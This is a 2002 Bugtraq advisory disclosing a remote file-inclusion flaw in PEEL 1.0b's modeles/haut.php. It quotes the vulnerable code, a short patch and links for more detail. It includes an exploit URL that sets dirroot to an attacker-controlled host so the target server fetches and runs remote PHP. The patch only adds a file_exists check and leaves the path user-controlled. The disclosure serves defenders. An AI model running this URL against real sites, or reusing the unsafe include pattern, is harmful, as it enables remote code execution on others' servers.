Bugtraq mailing list archives
PEEL (PHP)
From: "Frog Man" <leseulfrog () hotmail com>
Date: Tue, 31 Dec 2002 16:11:05 +0100
Informations : °°°°°°°°°°°°°° Version : 1.0b Website : http://www.mapetite-entreprise.com Problem : Include file PHP Code/Location : °°°°°°°°°°°°°°°°°°° modeles/haut.php : ----------------------------------------------------------- <? $langfile = $dirroot."/lang/".$SESSION["lang"]."/lang.php"; require ($langfile); ?> [...] ----------------------------------------------------------- Exploit : °°°°°°°°° http://[target]/modeles/haut.php?dirroot=http://[attacker]&SESSION=. with : http://[attacker]/lang/lang.php Patch : °°°°°°° In modeles/haut.php replace the lines : ----------------------------------------------------------- <? $langfile = $dirroot."/lang/".$SESSION["lang"]."/lang.php"; require ($langfile); ?> ----------------------------------------------------------- by : ----------------------------------------------------------- <? $langfile = $dirroot."/lang/".$SESSION["lang"]."/lang.php"; if (file_exists($langfile)){ require ($langfile); } ?> ----------------------------------------------------------- A patch can be found on http://www.phpsecure.org More details : °°°°°°°°°°°°°° In French : http://www.frog-man.org/tutos/PEEL.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FPEEL.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools frog-m@n _________________________________________________________________MSN Messenger : discutez en direct avec vos amis ! http://www.msn.fr/msger/default.asp
Current thread:
- PEEL (PHP) Frog Man (Dec 31)